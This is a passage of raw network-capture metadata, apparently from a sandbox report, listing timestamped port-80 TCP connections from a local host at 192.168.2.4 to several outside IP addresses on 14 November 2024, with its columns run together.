                                                                                                                                          Nov 14, 2024 16:29:04.479954004 CET4998180192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:04.487073898 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:04.489299059 CET4998180192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:04.501388073 CET4998180192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:04.509258032 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:04.509269953 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:04.509273052 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:04.509280920 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:04.509299040 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:04.512016058 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:04.512095928 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:04.512295008 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:04.512648106 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:05.227330923 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:05.227360964 CET8049981162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:05.227442980 CET4998180192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:06.007246971 CET4998180192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:07.025485992 CET4999580192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:07.030284882 CET8049995162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:07.037194014 CET4999580192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:07.042069912 CET4999580192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:07.048130989 CET8049995162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:07.798489094 CET8049995162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:07.850632906 CET4999580192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:12.814939976 CET8049995162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:12.822134972 CET4999580192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:12.861207962 CET4999580192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:12.866159916 CET8049995162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:18.210557938 CET5001980192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:18.217344046 CET8050019141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:18.217398882 CET5001980192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:18.227695942 CET5001980192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:18.234688044 CET8050019141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:19.004451036 CET8050019141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:19.004467010 CET8050019141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:19.004488945 CET8050019141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:19.004498959 CET8050019141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:19.004514933 CET8050019141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:19.004525900 CET8050019141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:19.004539967 CET8050019141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:19.004549026 CET5001980192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:19.004549026 CET5001980192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:19.004671097 CET5001980192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:19.007070065 CET8050019141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:19.007194996 CET5001980192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:19.741307974 CET5001980192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:20.761271000 CET5002080192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:20.766350985 CET8050020141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:20.772573948 CET5002080192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:20.778091908 CET5002080192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:20.784714937 CET8050020141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:21.484559059 CET8050020141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:21.484580994 CET8050020141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:21.484597921 CET8050020141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:21.484605074 CET8050020141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:21.484621048 CET8050020141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:21.484637022 CET8050020141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:21.484755993 CET5002080192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:21.485101938 CET8050020141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:21.485143900 CET5002080192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:21.487179995 CET8050020141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:21.493145943 CET5002080192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:22.288149118 CET5002080192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:23.307367086 CET5002180192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:23.312347889 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:23.319328070 CET5002180192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:23.326231956 CET5002180192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:23.331166029 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:23.331182003 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:23.331196070 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:23.331332922 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:23.331346035 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:23.331371069 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:23.331382990 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:23.331394911 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:23.331410885 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:24.044414043 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:24.044442892 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:24.044461966 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:24.044478893 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:24.044487953 CET5002180192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:24.044512033 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:24.044527054 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:24.044532061 CET5002180192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:24.044564962 CET5002180192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:24.045695066 CET8050021141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:24.045738935 CET5002180192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:24.835192919 CET5002180192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:25.877181053 CET5002280192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:25.882411003 CET8050022141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:25.882496119 CET5002280192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:25.892909050 CET5002280192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:25.898226976 CET8050022141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:26.601289034 CET8050022141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:26.603301048 CET8050022141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:26.603836060 CET5002280192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:26.605104923 CET5002280192.168.2.4141.193.213.11
                                                                                                                                          Nov 14, 2024 16:29:26.610976934 CET8050022141.193.213.11192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:31.673603058 CET5002380192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:31.678803921 CET805002376.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:31.678896904 CET5002380192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:31.693335056 CET5002380192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:31.698771000 CET805002376.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:32.317466021 CET805002376.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:32.317538023 CET5002380192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:33.210578918 CET5002380192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:33.215490103 CET805002376.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:34.228701115 CET5002480192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:34.235368013 CET805002476.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:34.235481977 CET5002480192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:34.245887041 CET5002480192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:34.252449989 CET805002476.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:34.867508888 CET805002476.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:34.867769957 CET5002480192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:35.756897926 CET5002480192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:35.762101889 CET805002476.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:36.775341034 CET5002580192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:36.781267881 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:36.783346891 CET5002580192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:36.793102026 CET5002580192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:36.798381090 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:36.798412085 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:36.798424959 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:36.798862934 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:36.798901081 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:36.798933029 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:36.799036026 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:36.799063921 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:36.799081087 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:37.420857906 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:37.425105095 CET5002580192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:38.303724051 CET5002580192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:38.309206963 CET805002576.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:39.323360920 CET5002680192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:39.328352928 CET805002676.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:39.333184004 CET5002680192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:39.337078094 CET5002680192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:39.342067957 CET805002676.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:39.954632998 CET805002676.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:39.957370996 CET805002676.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:39.957474947 CET5002680192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:39.958303928 CET5002680192.168.2.476.223.67.189
                                                                                                                                          Nov 14, 2024 16:29:39.964651108 CET805002676.223.67.189192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:44.987344027 CET5002780192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:44.992554903 CET80500273.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:44.999336958 CET5002780192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:45.005258083 CET5002780192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:45.010159969 CET80500273.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:45.691077948 CET80500273.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:45.691339970 CET5002780192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:46.506807089 CET5002780192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:46.514580011 CET80500273.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:47.525027990 CET5002880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:47.530148029 CET80500283.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:47.533200026 CET5002880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:47.542839050 CET5002880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:47.548029900 CET80500283.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:48.225599051 CET80500283.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:48.225656033 CET5002880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:49.055332899 CET5002880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:49.060292959 CET80500283.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.073957920 CET5002980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:50.078919888 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.078993082 CET5002980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:50.090987921 CET5002980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:50.096263885 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.096343040 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.096352100 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.096359015 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.096388102 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.096395969 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.096445084 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.096466064 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.096472025 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.743091106 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:50.749128103 CET5002980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:51.600589037 CET5002980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:51.605401039 CET80500293.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:52.619081974 CET5003080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:52.624846935 CET80500303.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:52.631109953 CET5003080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:52.635041952 CET5003080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:52.640697956 CET80500303.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:54.200273991 CET80500303.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:54.202518940 CET80500303.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:54.202665091 CET5003080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:54.203736067 CET5003080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:29:54.208631039 CET80500303.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:59.237111092 CET5003180192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:29:59.242139101 CET8050031172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:59.242253065 CET5003180192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:29:59.253113985 CET5003180192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:29:59.258359909 CET8050031172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:59.959435940 CET8050031172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:59.961077929 CET8050031172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:59.961251974 CET5003180192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:00.756779909 CET5003180192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:01.775079012 CET5003280192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:01.783480883 CET8050032172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:01.783584118 CET5003280192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:01.797724009 CET5003280192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:01.805898905 CET8050032172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:02.741549015 CET8050032172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:02.743488073 CET8050032172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:02.743717909 CET5003280192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:03.303623915 CET5003280192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:04.322774887 CET5003380192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:04.330588102 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:04.330692053 CET5003380192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:04.341108084 CET5003380192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:04.348882914 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:04.348891020 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:04.348927975 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:04.348994017 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:04.348999977 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:04.349090099 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:04.351679087 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:04.351686954 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:04.351692915 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:05.285464048 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:05.285903931 CET8050033172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:05.293102026 CET5003380192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:05.850634098 CET5003380192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:06.868983030 CET5003480192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:06.875093937 CET8050034172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:06.877091885 CET5003480192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:06.888783932 CET5003480192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:06.893989086 CET8050034172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:07.608331919 CET8050034172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:07.610269070 CET8050034172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:07.610476971 CET5003480192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:07.611160994 CET5003480192.168.2.4172.67.177.220
                                                                                                                                          Nov 14, 2024 16:30:07.615998030 CET8050034172.67.177.220192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:12.667078018 CET5003580192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:12.672905922 CET8050035154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:12.677051067 CET5003580192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:12.688956022 CET5003580192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:12.694531918 CET8050035154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:14.194272041 CET5003580192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:14.506201982 CET8050035154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:14.506282091 CET5003580192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:14.506335974 CET8050035154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:14.506396055 CET5003580192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:14.506412029 CET8050035154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:14.506503105 CET5003580192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:14.506505966 CET8050035154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:14.506546974 CET5003580192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:14.506896973 CET8050035154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:14.506937981 CET5003580192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:14.507244110 CET8050035154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:14.507280111 CET5003580192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:15.213057041 CET5003680192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:15.218029022 CET8050036154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:15.221030951 CET5003680192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:15.317095995 CET5003680192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:15.322369099 CET8050036154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:16.188601971 CET8050036154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:16.241151094 CET5003680192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:16.370137930 CET8050036154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:16.370306969 CET5003680192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:16.819768906 CET5003680192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:18.062289953 CET5003780192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:18.070216894 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:18.070291996 CET5003780192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:18.088232994 CET5003780192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:18.096071959 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:18.096081018 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:18.096107960 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:18.096115112 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:18.096143007 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:18.096149921 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:18.096158028 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:18.098608971 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:18.098615885 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:19.029942989 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:19.084979057 CET5003780192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:19.236004114 CET8050037154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:19.236231089 CET5003780192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:19.600632906 CET5003780192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:20.620263100 CET5003880192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:20.986211061 CET8050038154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:20.989104986 CET5003880192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:20.996929884 CET5003880192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:21.001765966 CET8050038154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:21.982358932 CET8050038154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:22.022381067 CET5003880192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:22.134171009 CET8050038154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:22.134402990 CET5003880192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:22.135168076 CET5003880192.168.2.4154.23.181.7
                                                                                                                                          Nov 14, 2024 16:30:22.139971972 CET8050038154.23.181.7192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:27.172508955 CET5003980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:27.177443027 CET80500393.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:27.181075096 CET5003980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:27.191183090 CET5003980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:27.196335077 CET80500393.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:28.706732035 CET5003980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:28.712232113 CET80500393.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:28.720771074 CET5003980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:29.712799072 CET5004080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:29.718873024 CET80500403.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:29.718959093 CET5004080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:29.728017092 CET5004080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:29.732980013 CET80500403.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:31.171629906 CET80500403.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:31.171911955 CET80500403.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:31.172054052 CET5004080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:31.172429085 CET80500403.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:31.174932957 CET5004080192.168.2.43.33.130.190
